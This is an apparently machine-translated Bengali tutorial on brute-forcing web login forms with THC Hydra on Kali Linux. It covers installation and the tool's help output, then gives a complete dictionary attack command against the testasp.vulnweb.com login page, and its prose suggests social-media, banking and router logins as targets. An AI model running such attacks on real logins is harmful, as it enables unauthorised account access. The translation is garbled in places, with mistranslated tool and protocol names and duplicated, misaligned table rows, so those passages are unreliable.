কালী লিনাক্সে হাইড্রার সাথে ওয়েব ভিত্তিক লগইন পৃষ্ঠা ক্র্যাক করুন

Crack Web Based Login Page With Hydra Kali Linux



একটি পাসওয়ার্ড টেকনিক্যালি সংজ্ঞায়িত করা হয় অক্ষরের গোপন স্ট্রিং যা প্রমাণীকরণ বা সম্পদের অ্যাক্সেস লাভের জন্য ব্যবহৃত হয়। এটি অবশ্যই গোপনে রাখা উচিত এবং অন্যদের থেকে লুকিয়ে রাখা উচিত যারা এই সম্পদগুলিতে অ্যাক্সেসের অনুমতি নেই। কম্পিউটারের প্রথম দিন থেকেই কম্পিউটারের সাথে পাসওয়ার্ড ব্যবহার করা হয়েছে। প্রথমবার শেয়ারিং সিস্টেমগুলির মধ্যে একটি, 1961 সালে চালু করা হয়েছিল। এটিতে একটি লগইন কমান্ড ছিল যা ব্যবহারকারীর পাসওয়ার্ডের অনুরোধ করেছিল। পাসওয়ার্ড টাইপ করার পর, সিস্টেম সম্ভব হলে প্রিন্টিং মেকানিজম বন্ধ করে দেয়, যাতে ব্যবহারকারী গোপনীয়তার সাথে তার পাসওয়ার্ড টাইপ করতে পারে।

পাসওয়ার্ডের শক্তি হল দৈর্ঘ্য, জটিলতা এবং অনির্দেশ্যতার একটি ফাংশন। এটি অনুমান বা ভাঙ্গার প্রতিরোধে কার্যকারিতা পরিমাপ করে। দুর্বল পাসওয়ার্ড, অন্যদিকে অনুমান করতে এবং ব্যক্তিগত/কর্পোরেট ই-মেইল, আর্থিক তথ্য, ব্যবসায়িক তথ্য, ক্রেডিট কার্ড ইত্যাদির মতো সংবেদনশীল তথ্য অ্যাক্সেস করার জন্য প্রয়োজনীয় সময়কে ছোট করে।







বিভিন্ন আক্রমণের পরিকল্পনার শক্তির শক্তির সাথে পাসওয়ার্ড দুর্বল হতে পারে এমন অনেকগুলি উপায় রয়েছে। এই ধরনের ক্রেডেনশিয়াল আক্রমণের মধ্যে সবচেয়ে জনপ্রিয় হল, বর্বর শক্তি। এটি একটি পরীক্ষা এবং ত্রুটি পদ্ধতি যেমন অনুমান, এনক্রিপ্ট করা ডেটা ডিকোড করার চেষ্টা যেমন পাসওয়ার্ড বা ডেটা এনক্রিপশন অ্যাপ্লিকেশন প্রোগ্রাম বা হ্যাকিং টুল দ্বারা ব্যবহৃত হয়।



হাইড্রা হল দ্রুততম নেটওয়ার্ক লগন ক্র্যাকার যা অসংখ্য আক্রমণ প্রোটোকল সমর্থন করে। এটি খুব দ্রুত এবং নমনীয়, এবং নতুন মডিউল যোগ করা সহজ। এই সরঞ্জামটি গবেষক এবং সুরক্ষা পরামর্শদাতাদের পক্ষে দূর থেকে একটি সিস্টেমে অননুমোদিত অ্যাক্সেস অর্জন করা কতটা সহজ তা দেখানো সম্ভব করে তোলে। হাইড্রা রচনা করেছিলেন ভ্যান হাউজার এবং এটি অতিরিক্তভাবে ডেভিড ম্যাসিজাক দ্বারা সমর্থিত। সর্বশেষ আপডেটে হাইড্রা ডেভেলপমেন্টকে জনসাধারণের গিটহাব রিপোজিটরিতে সরানো হয়েছে: https://github.com/vanhauser-thc/thc-hydra।



হাইড্রাকে লিনাক্স, উইন্ডোজ/সাইগউইন, সোলারিস 11, ফ্রিবিএসডি 8.1, ওপেনবিএসডি, ওএসএক্স, কিউএনএক্স/ব্ল্যাকবেরিতে কম্পাইল করার জন্য পরীক্ষা করা হয়েছিল এবং এটি একটি বিশেষ ওপেনএসএসএল লাইসেন্স সম্প্রসারণের সাথে জিপিএলভি 3 এর অধীনে উপলব্ধ করা হয়েছে।





THC হাইড্রা এই প্রোটোকলগুলিকে সমর্থন করে: Cisco AAA, Cisco auth, Cisco Enable, CVS, FTP, HTTP (S) -FORM-GET, HTTP (S) -FORM-POST, HTTP (S) -GET, HTTP (S) -HEAD , HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MySQL, NNTP, Oracle Listener, Oracle SID, PC-Anywhere, PC-NFS, POP3, PostgreSQL, RDP, Rexec, Rlogin, Rsh, SIP, SMB (NT), SMTP, SMTP Enum, SNMP v1+v2+v3, SOCKS5, SSH (v1 এবং v2), SSHKEY, Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC এবং XMPP।

অন্যদের ক্র্যাকিং সরঞ্জামগুলির সাথে হাইড্রার তুলনা

হাইড্রার পাশে প্রচুর লগইন ক্র্যাকার সরঞ্জাম রয়েছে, তবে কেউই প্রোটোকলের বিশাল তালিকা সমর্থন করে না এবং হাইড্রার মতো সমান্তরাল লগইন ক্র্যাকার সমর্থন করে না। নীচের টেবিলগুলি মেডুসা এবং এনক্র্যাকের বিরুদ্ধে বৈশিষ্ট্য, পরিষেবা এবং গতির তুলনার ফলাফল দেখায়।



বৈশিষ্ট্য

বৈশিষ্ট্য হাইড্রা জেলিফিশ এনক্র্যাক
লাইসেন্স AGPLv3 GPLv2 GPLv2 + Nmap পদ
IPv6 সাপোর্ট হ্যাঁ না না
গ্রাফিক ইউজার ইন্টারফেস হ্যাঁ হ্যাঁ না
আন্তর্জাতিকীকৃত সমর্থন (RFC 4013) হ্যাঁ না না
HTTP প্রক্সি সমর্থন হ্যাঁ হ্যাঁ না
SOCKS প্রক্সি সমর্থন হ্যাঁ না না
সমর্থিত প্রোটোকল ৫১ 22 7

সেবা

ক্র্যাক ওয়েব ভিত্তিক লগইন পেজ দিয়ে

সেবা বিস্তারিত হাইড্রা জেলিফিশ এনক্র্যাক
এডিএএম -6500 হ্যাঁ না না
এএফপি হ্যাঁ হ্যাঁ না
গ্রহাণু হ্যাঁ না না
সিসকো পাসওয়ার্ড হ্যাঁ না না
সিসকো সক্ষম হ্যাঁ না না
সিভিএস হ্যাঁ হ্যাঁ না
ফায়ারবার্ড হ্যাঁ না না
এফটিপি হ্যাঁ হ্যাঁ হ্যাঁ
SSL সাপোর্ট SSL এর উপর AUTH TLS এবং FTP SSL এর উপর AUTH TLS এবং FTP না
HTTP পদ্ধতি (গুলি) পান, মাথা, পোস্ট পাওয়া পাওয়া
মৌলিক সত্য হ্যাঁ হ্যাঁ হ্যাঁ
HTTP ফর্ম পদ্ধতি (গুলি) পান, পোস্ট করুন পান, পোস্ট করুন না
SSL সাপোর্ট HTTPS HTTPS না
হাইপারটেক্সট ট্রান্সফার প্রটোকল প্রক্সি মৌলিক সত্য হ্যাঁ না না
DIGEST-MD5 Auth হ্যাঁ না না
NTLM Auth হ্যাঁ না না
SSL সাপোর্ট HTTPS না না
HTTP প্রক্সি URL গণনা হ্যাঁ না না
ICQ v5 হ্যাঁ
না না
IMAP লগইন সমর্থন হ্যাঁ হ্যাঁ না
AUTH লগইন সমর্থন হ্যাঁ না না
AUTH PLAIN সমর্থন হ্যাঁ হ্যাঁ না
AUTH CRAM-MD5 সাপোর্ট হ্যাঁ না না
AUTH CRAM-SHA1 সমর্থন হ্যাঁ না না
AUTH CRAM-SHA256 সমর্থন হ্যাঁ না না
AUTH DIGEST-MD5 সাপোর্ট হ্যাঁ না না
AUTH NTLM সাপোর্ট হ্যাঁ হ্যাঁ না
AUTH SCRAM-SHA1 সমর্থন হ্যাঁ না না
SSL সাপোর্ট IMAPS এবং STARTTLS IMAPS এবং STARTTLS না
আইআরসি সাধারণ সার্ভারের পাসওয়ার্ড হ্যাঁ না না
OPER মোড পাসওয়ার্ড হ্যাঁ না না
এলডিএপি v2, সহজ সমর্থন হ্যাঁ না না
v3, সহজ সমর্থন হ্যাঁ না না
v3, AUTH CRAM-MD5 সাপোর্ট হ্যাঁ না না
AUTH DIGEST-MD5 সাপোর্ট হ্যাঁ
AUTH NTLM সাপোর্ট হ্যাঁ হ্যাঁ
AUTH SCRAM-SHA1 সমর্থন হ্যাঁ
SSL সাপোর্ট IMAPS এবং STARTTLS IMAPS এবং STARTTLS
আইআরসি সাধারণ সার্ভারের পাসওয়ার্ড হ্যাঁ
OPER মোড পাসওয়ার্ড হ্যাঁ
এলডিএপি v2, সহজ সমর্থন হ্যাঁ
v3, সহজ সমর্থন হ্যাঁ
v3, AUTH CRAM-MD5 সাপোর্ট হ্যাঁ
v3, AUTH DIGEST-MD5 সাপোর্ট হ্যাঁ
এমএস-এসকিউএল হ্যাঁ হ্যাঁ
মাইএসকিউএল v3.x হ্যাঁ হ্যাঁ
v4.x হ্যাঁ হ্যাঁ
v5.x হ্যাঁ হ্যাঁ
এনসিপি হ্যাঁ হ্যাঁ
এনএনটিপি ব্যবহারকারী সমর্থন হ্যাঁ হ্যাঁ
AUTH লগইন সমর্থন হ্যাঁ
AUTH PLAIN সমর্থন হ্যাঁ
AUTH CRAM-MD5 সাপোর্ট হ্যাঁ
AUTH DIGEST-MD5 সাপোর্ট হ্যাঁ
AUTH NTLM সাপোর্ট হ্যাঁ
SSL সাপোর্ট SSL এর উপর STARTTLS এবং NNTP
ওরাকল তথ্যশালা হ্যাঁ হ্যাঁ
টিএনএস শ্রোতা হ্যাঁ
SID গণনা হ্যাঁ
পিসি-এনএফএস হ্যাঁ
পিসি কোথাও নেটিভ প্রমাণীকরণ হ্যাঁ হ্যাঁ
ওএস ভিত্তিক প্রমাণীকরণ (এমএস) হ্যাঁ
POP3 ব্যবহারকারী সমর্থন হ্যাঁ হ্যাঁ হ্যাঁ
APOP সমর্থন হ্যাঁ
AUTH লগইন সমর্থন হ্যাঁ হ্যাঁ
AUTH PLAIN সমর্থন হ্যাঁ হ্যাঁ
AUTH CRAM-MD5 সাপোর্ট হ্যাঁ
AUTH CRAM-SHA1 সমর্থন হ্যাঁ
AUTH CRAM-SHA256 সমর্থন হ্যাঁ
AUTH DIGEST-MD5 সাপোর্ট হ্যাঁ
AUTH NTLM সাপোর্ট হ্যাঁ হ্যাঁ
SSL সাপোর্ট POP3S এবং STARTTLS POP3S এবং STARTTLS POP3S
PostgreSQL হ্যাঁ হ্যাঁ
গ্রহাণু হ্যাঁ
আরডিপি উইন্ডোজ ওয়ার্কস্টেশন হ্যাঁ হ্যাঁ হ্যাঁ
উইন্ডোজ সার্ভার হ্যাঁ হ্যাঁ
ডোমেইন অথ হ্যাঁ হ্যাঁ
রেডিস হ্যাঁ না
REXEC হ্যাঁ হ্যাঁ
লগইন হ্যাঁ হ্যাঁ
RPCAP হ্যাঁ না
আরএসএইচ হ্যাঁ হ্যাঁ
আরটিএসপি হ্যাঁ না
এসএপি আর / 3 হ্যাঁ
সিমেন্স এস 7-300 হ্যাঁ
চুমুক হ্যাঁ
SSL সাপোর্ট SSL এর উপর SIP করুন
এসএমবি NetBIOS মোড হ্যাঁ হ্যাঁ না
W2K নেটিভ মোড হ্যাঁ হ্যাঁ হ্যাঁ
হ্যাশ মোড হ্যাঁ হ্যাঁ না
টেক্সট অথথ সাফ করুন হ্যাঁ হ্যাঁ
LMv1 Auth হ্যাঁ হ্যাঁ হ্যাঁ
LMv2 Auth হ্যাঁ হ্যাঁ হ্যাঁ
NTLMv1 Auth হ্যাঁ হ্যাঁ হ্যাঁ
NTLMv2 Auth হ্যাঁ হ্যাঁ হ্যাঁ
SMTP AUTH লগইন সমর্থন হ্যাঁ হ্যাঁ
AUTH PLAIN সমর্থন হ্যাঁ হ্যাঁ
AUTH CRAM-MD5 সাপোর্ট হ্যাঁ
AUTH DIGEST-MD5 সাপোর্ট হ্যাঁ
AUTH NTLM সাপোর্ট হ্যাঁ হ্যাঁ
SSL সাপোর্ট SMTPS এবং STARTTLS SMTPS এবং STARTTLS
SMTP ব্যবহারকারী Enum VRFY cmd হ্যাঁ হ্যাঁ
EXPN cmd হ্যাঁ হ্যাঁ
RCPT থেকে cmd হ্যাঁ হ্যাঁ
এসএনএমপি v1 হ্যাঁ হ্যাঁ
v2c হ্যাঁ হ্যাঁ
v3 (শুধুমাত্র MD5/SHA1 লেখক)
মোজা v5, পাসওয়ার্ড সত্য হ্যাঁ
এসএসএইচ v1 হ্যাঁ
v2 হ্যাঁ হ্যাঁ হ্যাঁ
এসএসএইচ কী v1, v2 হ্যাঁ
বিপর্যয় (SVN) হ্যাঁ হ্যাঁ
দলের কথা টিএস 2 হ্যাঁ
টেলনেট হ্যাঁ হ্যাঁ হ্যাঁ
XMPP AUTH লগইন সমর্থন হ্যাঁ
AUTH PLAIN সমর্থন হ্যাঁ
AUTH CRAM-MD5 সাপোর্ট হ্যাঁ
AUTH DIGEST-MD5 সাপোর্ট হ্যাঁ
AUTH SCRAM-SHA1 সমর্থন হ্যাঁ
ভিএমওয়্যার অথ ডেমন v1.00 / v1.10 হ্যাঁ হ্যাঁ
SSL সাপোর্ট হ্যাঁ হ্যাঁ
ভিএনসি RFB 3.x পাসওয়ার্ড সাপোর্ট হ্যাঁ হ্যাঁ
RFB 3.x ব্যবহারকারী+পাসওয়ার্ড সমর্থন (শুধুমাত্র UltraVNC)
RFB 4.x পাসওয়ার্ড সাপোর্ট হ্যাঁ হ্যাঁ
RFB 4.x ব্যবহারকারী+পাসওয়ার্ড সমর্থন (শুধুমাত্র UltraVNC)

গতির তুলনা

গতি (গুলি) হাইড্রা জেলিফিশ এনক্র্যাক
1 টাস্ক / এফটিপি মডিউল 11.93 12.97 18.01
4 টাস্ক / এফটিপি মডিউল 4.20 5.24 9.01
16 টাস্ক / এফটিপি মডিউল 2.44 2.71 12.01
1 টাস্ক / SSH v2 মডিউল 32.56 33.84 45.02
4 টাস্ক / SSH v2 মডিউল 10.95 ভাঙা মিস
16 টাস্ক / SSH v2 মডিউল 5.14 ভাঙা মিস

এটি হাইড্রার একটি সংক্ষিপ্ত সহজ ভূমিকা ছিল। এখন ইনস্টলেশনের দিকে এগিয়ে যাক।

হাইড্রা ইনস্টল করা

হাইড্রা কালি লিনাক্সে প্রি-ইন্সটল করা আছে, তবে আপনার যদি অন্য কোন অপারেটিং সিস্টেম থাকে তাহলে আপনি কম্পাইল করে আপনার সিস্টেমে ইন্সটল করতে পারেন। বর্তমানে, বিভিন্ন প্ল্যাটফর্মে হাইড্রার সমর্থন:

  • সমস্ত ইউনিক্স প্ল্যাটফর্ম (লিনাক্স, *বিএসডি, সোলারিস ইত্যাদি)
  • ম্যাকওএস (মূলত একটি বিএসডি ক্লোন)
  • সাইগউইনের সাথে উইন্ডোজ (উভয় IPv4 এবং IPv6)
  • লিনাক্স, ম্যাকওএস বা কিউএনএক্স (যেমন অ্যান্ড্রয়েড, আইফোন, ব্ল্যাকবেরি 10, জাউরাস, আইপ্যাক) ভিত্তিক মোবাইল সিস্টেম

হাইড্রা ডাউনলোড, কনফিগার, কম্পাইল এবং ইনস্টল করতে, কেবল টার্মিনালে টাইপ করুন:

git clone https://github.com/vanhauser-thc/thc-hydra.git cd thc-hydra ./configure make make install 

আপনার যদি উবুন্টু/ডেবিয়ান থাকে তবে আপনার কিছু নির্ভরতা লাইব্রেরির প্রয়োজন হবে:

apt install libssl-dev libssh-dev libidn11-dev libpcre3-dev libgtk2.0-dev libmysqlclient-dev libpq-dev libsvn-dev firebird-dev libncp-dev 

আপনি যদি আপনার সংগ্রহস্থলে সেই লাইব্রেরিগুলি খুঁজে না পান তবে আপনাকে সেগুলি ম্যানুয়ালি ডাউনলোড এবং ইনস্টল করতে হবে।

হাইড্রা কিভাবে ব্যবহার করবেন

অভিনন্দন, এখন আপনি আপনার সিস্টেমে হাইড্রা ইনস্টল করতে সফল হয়েছেন। আসলে, হাইড্রা দুটি স্বাদ নিয়ে আসে, GUI-gtk এবং আমার প্রিয়, CLI সংস্করণ। এবং উপরন্তু হাইড্রার CLI নির্দেশিত সংস্করণ রয়েছে, এটিকে হাইড্রা-উইজার্ড বলা হয়। আপনি টার্মিনালে ম্যানুয়ালি সমস্ত কমান্ড বা আর্গুমেন্ট টাইপ করার পরিবর্তে ধাপে ধাপে নির্দেশিত হবেন। আপনার টার্মিনাল টাইপ থেকে হাইড্রা চালানোর জন্য:

CLI এর জন্য:

hydra

CLI- উইজার্ডের জন্য:

hydra-wizard

GUI এর জন্য:

xhydra

আপনি 'হাইড্রা' টাইপ করার পরে এটি এইরকম সাহায্য কমান্ড প্রদর্শন করবে:

 [email protected] :~# hydra -h Hydra v8.6 (c)2017 by van Hauser/THC & David Maciejak - for legal purposes only Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-SuvV46] [service://server[:PORT][/OPT]] Options: -R restore a previous aborted/crashed session -S perform an SSL connect -s PORT if the service is on a different default port, define it here -l LOGIN or -L FILE login with LOGIN name, or load several logins from FILE -p PASS or -P FILE try password PASS, or load several passwords from FILE -x MIN:MAX:CHARSET password bruteforce generation, type '-x -h' to get help -e nsr try 'n' null password, 's' login as pass and/or 'r' reversed login -u loop around users, not passwords (effective! implied with -x) -C FILE colon separated 'login:pass' format, instead of -L/-P options -M FILE list of servers to be attacked in parallel, one entry per line -o FILE write found login/password pairs to FILE instead of stdout -f / -F exit when a login/pass pair is found (-M: -f per host, -F global) -t TASKS run TASKS number of connects in parallel (per host, default: 16) -w / -W TIME waittime for responses (32s) / between connects per thread -4 / -6 prefer IPv4 (default) or IPv6 addresses -v / -V / -d verbose mode / show login+pass for each attempt / debug mode -U service module usage details server the target server (use either this OR the -M option) service the service to crack (see below for supported protocols) OPT some service modules support additional input (-U for module help) Supported services: asterisk afp cisco cisco-enable cvs firebird ftp ftps http[s]-head http[s]-post-form http-proxy http-proxy-urlenum icq imap[s] irc ldap2[s] ldap3[-crammd5][s] mssql mysql ncp nntp oracle-listener oracle-sid pcanywhere pcnfs pop3[s] postgres rdp rexec rlogin rsh s7-300 sip smb smtp[s] smtp-enum snmp socks5 ssh sshkey svn teamspeak telnet[s] vmauthd vnc xmpp Hydra is a tool to guess/crack valid login/password pairs - usage only allowed for legal purposes. This tool is licensed under AGPL v3.0. The newest version is always available at http://www.thc.org/thc-hydra These services were not compiled in: sapr3 oracle. Use HYDRA_PROXY_HTTP or HYDRA_PROXY - and if needed HYDRA_PROXY_AUTH - environment for a proxy setup. E.g.: % export HYDRA_PROXY=socks5://127.0.0.1:9150 (or socks4:// or connect://) % export HYDRA_PROXY_HTTP=http://proxy:8080 % export HYDRA_PROXY_AUTH=user:pass Examples: hydra -l user -P passlist.txt ftp://192.168.0.1 hydra -L userlist.txt -p defaultpw imap://192.168.0.1/PLAIN hydra -C defaults.txt -6 pop3s://[fe80::2c:31ff:fe12:ac11]:143/TLS:DIGEST-MD5 hydra -l admin -p password ftp://[192.168.0.0/24]/ hydra -L logins.txt -P pws.txt -M targets.txt ssh

ব্রুটফোর্স হাইড্রার সাথে ওয়েব ভিত্তিক লগইন

হাইড্রা কিছু ব্রুটফোর্সিং সার্ভিস সমর্থন করে যেমন আমি আগে উল্লেখ করেছি, তাদের মধ্যে একটি ব্রাউটফোর্স ওয়েব ভিত্তিক লগইন যেমন সোশ্যাল মিডিয়া লগইন ফর্ম, ইউজার ব্যাংকিং লগইন ফর্ম, আপনার রাউটার ওয়েব ভিত্তিক লগইন ইত্যাদি ব্যবহার করে। যা এই অনুরোধটি পরিচালনা করবে। এই টিউটোরিয়ালে আমি আপনাকে দেখাবো কিভাবে দুর্বল ওয়েব লগইনগুলিকে ব্রুটফোর্স করতে হয়। হাইড্রা জ্বালানোর আগে আমাদের নীচের কিছু প্রয়োজনীয় যুক্তি জানা উচিত:

  • টার্গেট : http://testasp.vulnweb.com/Login.asp?RetURL=%2FDefault%2Easp%3F
  • ব্যবহারকারীর নাম লগইন করুন : অ্যাডমিন (যদি আপনি নিশ্চিত না হন তবে ব্রুটফোর্স এটি করুন)
  • পাসওয়ার্ড তালিকা : সম্ভাব্য পাসওয়ার্ড সম্বলিত অভিধান ফাইল তালিকার অবস্থান।
  • ফর্ম পরামিতি : সাধারণভাবে, অনুরোধ প্যারামিটারগুলির ফর্ম পেতে টেম্পার ডেটা বা প্রক্সি ব্যবহার করুন। কিন্তু এখানে আমি আইসওয়েসেল, ফায়ারফক্স ভিত্তিক, নেটওয়ার্ক ডেভেলপার টুলবার ব্যবহার করছি।
  • পরিষেবা মডিউল : http-post-form
Help for module http-post-form: ============================================================================ Module http-post-form requires the page and the parameters for the web form. By default this module is configured to follow a maximum of 5 redirections in a row. It always gathers a new cookie from the same URL without variables The parameters take three ':' separated values, plus optional values. (Note: if you need a colon in the option string as value, escape it with ':', but do not escape a '' with '\'.) Syntax: [url]:[form parameters]:[condition string][:(optional)[:(optional)] First is the page on the server to GET or POST to (URL). Second is the POST/GET variables (taken from either the browser, proxy, etc. with usernames and passwords being replaced in the '^USER^' and '^PASS^' placeholders (FORM PARAMETERS) Third is the string that it checks for an *invalid* login (by default) Invalid condition login check can be preceded by 'F=', successful condition login check must be preceded by 'S='. This is where most people get it wrong. You have to check the webapp what a failed string looks like and put it in this parameter! The following parameters are optional: C=/page/uri to define a different page to gather initial cookies from (h|H)=My-Hdr: foo to send a user defined HTTP header with each request ^USER^ and ^PASS^ can also be put into these headers! Note: 'h' will add the user-defined header at the end regardless it's already being sent by Hydra or not. 'H' will replace the value of that header if it exists, by the one supplied by the user, or add the header at the end Note that if you are going to put colons (:) in your headers you should escape them with a backslash (). All colons that are not option separators should be escaped (see the examples above and below). You can specify a header without escaping the colons, but that way you will not be able to put colons in the header value itself, as they will be interpreted by hydra as option separators.

ব্রাউজার, আইসওয়েজেল/ফায়ারফক্স ব্যবহার করে পোস্ট প্যারামিটারগুলি পাওয়া

আপনার ফায়ারফক্স ব্রাউজারে কী চাপুন ' CTRL + SHIFT + Q '। তারপর ওয়েব লগইন পৃষ্ঠা খুলুনhttp://testasp.vulnweb.com/Login.asp?RetURL=%2FDefault%2Easp%3F, আপনি লক্ষ্য করবেন কিছু টেক্সট নেটওয়ার্ক ডেভেলপার ট্যাবে দেখা যাচ্ছে। এটি আপনাকে বলে যে আমাদের কাছে কোন ফাইল স্থানান্তর করা হয়েছে। দেখুন পদ্ধতিটি সবই পেয়েছে, যেহেতু আমরা এখনও কোন ডেটা পোস্ট করি নি।

পোস্ট-ফর্ম প্যারামিটারগুলি পেতে, ব্যবহারকারীর নাম এবং পাসওয়ার্ড ফর্মের মধ্যে যাই লিখুন। আপনি নেটওয়ার্ক ডেভেলপার ট্যাবে একটি নতুন POST পদ্ধতি লক্ষ্য করবেন। সেই লাইনে ডাবল ক্লিক করুন, হেডার ট্যাবে এডিট করুন এবং ডানদিকে আবার পাঠান বোতামটি ক্লিক করুন। রিকোয়েস্ট বডিতে শেষ লাইনটি অনুলিপি করুন, যেমন tfUName = asu & tfUPass = রাইমু । দ্য tfUName এবং tfUPass আমাদের প্রয়োজনীয় প্যারামিটার। নীচে দেখা যায়:

কালী লিনাক্সের গুচ্ছ শব্দ তালিকা আছে, উপযুক্ত শব্দ তালিকা নির্বাচন করুন অথবা শুধু rockyou.txt স্থান ব্যবহার করুন /usr/share/wordlists/ নীচে দেখা যায়:

ঠিক আছে, এখন আমরা আমাদের প্রয়োজনীয় সমস্ত যুক্তি পেয়েছি এবং হাইড্রা জ্বালানোর জন্য প্রস্তুত। এখানে কমান্ড প্যাটার্ন:

hydra -l -P [/code] Finally, based on information we have gathered, our commands ahould look something like this: hydra -l admin -P /usr/share/wordlists/rockyou.txt testasp.vulnweb.com http-post-form '/Login.asp?RetURL=%2FDefault%2Easp%3F:tfUName=^USER^&tfUPass=^PASS^:S=logout' -vV -f

আসুন কমান্ডগুলি ভাঙি:

  • দ্য : ব্যবহারকারী নাম একাউন্ট ধারণকারী একটি শব্দ, একটি ফাইলে সম্ভাব্য ব্যবহারকারীর নামের তালিকা উল্লেখ করতে -L ব্যবহার করুন।
  • পি : সম্ভাব্য পাসওয়ার্ডের একটি ফাইল তালিকা, অনুমান করার পরিবর্তে একটি শব্দ পাসওয়ার্ড ব্যবহার করতে -p ব্যবহার করুন।
  • testapp.vunlwebapp.com : একটি হোস্টনাম বা টার্গেট
  • http-post-form : আমরা যে পরিষেবা মডিউলটি ব্যবহার করি
  • /Login.asp?RetURL=%2FDefault%2Easp%3F:tfUName=^USER^&tfUPass=^PASS^:S=logout = 3 টি প্যারামিটার প্রয়োজন, সিনট্যাক্স হল:
    {পেজ ইউআরএল}: {রিকোয়েস্ট পোস্ট বডি ফর্ম প্যারামিটার}: S = {সফলভাবে লগ ইন করার পরে পৃষ্ঠায় যা খুজে নিন}
  • v = ভার্বোজ মোড
  • ভি = লগইন দেখান: প্রতিটি প্রচেষ্টার জন্য পাস করুন
  • = পেয়ার লগইন হলে প্রোগ্রামটি বন্ধ করুন: পাসওয়ার্ড পাওয়া যায়

এখন হাইড্রাকে আমাদের জন্য পাসওয়ার্ড ভাঙার চেষ্টা করা যাক, এটি সময় প্রয়োজন কারণ এটি একটি অভিধান আক্রমণ। একবার আপনি একজোড়া লগইন খুঁজে পেতে সফল হন: পাসওয়ার্ড হাইড্রা অবিলম্বে কাজটি বন্ধ করে দেবে এবং বৈধ প্রমাণপত্র দেখাবে।

হাইড্রা করতে পারে এমন অনেক কিছু আছে, যেহেতু এই টিউটোরিয়ালে আমরা শুধু শিখেছি কিভাবে হাইড্রা ব্যবহার করে ওয়েব ভিত্তিক লগন ব্রুটফোর্স করতে হয়, আমরা কেবল একটি প্রোটোকল শিখি, সেটা হল http-post-form প্রোটোকল। আমরা অন্য প্রোটোকল যেমন ssh, ftp, telnet, VNC, proxy ইত্যাদির বিরুদ্ধেও হাইড্রা ব্যবহার করতে পারি।